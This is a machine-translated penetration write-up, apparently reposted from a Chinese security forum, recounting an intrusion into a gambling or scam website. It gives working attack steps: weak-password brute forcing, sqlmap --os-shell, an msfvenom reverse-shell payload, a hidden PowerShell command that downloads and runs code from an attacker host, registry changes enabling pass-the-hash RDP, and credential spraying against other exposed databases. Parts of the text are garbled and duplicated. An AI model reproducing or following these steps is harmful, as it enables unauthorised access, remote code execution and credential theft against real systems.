Title: Penetration notes on a spinach site

0x00 Introduction

I was bored and I found a spinach online for a simple test and took notes. The big guys squirted lightly. Please advise if there are any shortcomings.

0x01 Weak password

Visiting the website is a login page. Without the verification code, bp is directly enabled. The weak password admin/123456 is successfully exposed and directly enters the background.

0x02  Inject and get permission

I looked through many functional points, found the upload interface at one functional point, and tried to upload the file, but found that it could not be uploaded, so I added a whitelist. Choose to give up and continue looking. Adding single quotes to a certain http://url/GroupMember.aspx?gid=parameter will directly report an error. Isn't this coming after SQL injection?

Just do it and directly SQLMAP.

Found as MSSQL and DBA permissions, directly --os-shell

Online MSF

Already obtained ordinary permissions, the next step is to launch msf to increase the rights. msf generates a powershell script and places it in the website directory.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection xx.ps1

Vps enable monitoring

Use powershell to go online sessionpowershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))'

If you want to execute powershell through url splicing stacking, there will be a problem, which is the single quote closure problem. We can encode the powershell so that we can bypass the single quote problem. Here is a good website.

https://r0yanx.com/tools/java_exec_encode/elevation of rights

The session has been launched, and the next goal is to obtain system permissions. Fortunately, getsystem can get system permissions directly. If you need to raise the rights, the Tudou Family will recommend the promotion of rights. The success rate in actual combat is very high and there are many server versions that will affect it.

Migrate the process to prevent the process from falling off.

Remote login to the server

I found that the server opened port 3389 because it has system permissions and is a 2012 system. If the plain text password is not captured by the version greater than 2008, I will directly modify the adminnistrator password. (It is not recommended to directly modify the administrator password in actual combat)

Use hash to log in to the administrator account remotely

Because it is Win2012 that cannot obtain the plain text password, it is a bit inappropriate to directly modify the administrator password. Try to log in to the machine remotely by getting the administrator NTLM. (It's not the same one, it just provides one idea)

Remote login to RDP using hash, you need to enable 'Restricted Admin Mode'REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /vDisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //Open Restricted Admin modeREG query 'HKLM\System\CurrentControlSet\Control\Lsa' | findstr 'DisableRestrictedAdmin' //Check whether0x0 is enabled means that REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin/tREG_DWORD/d00000000/f//Open RestrictedAdminmodeREG query 'HKLM\System\CurrentControlSet\Control\Lsa' | findstr 'DisableRestrictedAdmin' //Check whether0x0 is enabled means it is enabled

Successfully utilized hash remote administrator desktop

04

0x03 Others

In the early stage, I found that port 1433 was open, so I looked for the database configuration file and logged into the database.

I looked through Fofa and found that there are quite a lot of assets, and many of them have open port 1433. I guess there will be websites deployed by the same person. I tried to use the obtained password to blast the port 1433 of these assets, and successfully hit several databases, all with sa permissions. Finish.

Reprinted from the original link: https://mp.weixin.qq.com/s/kj55hbZMC9jF6xmbzXWu4whttps://xz.aliyun.com/t/12501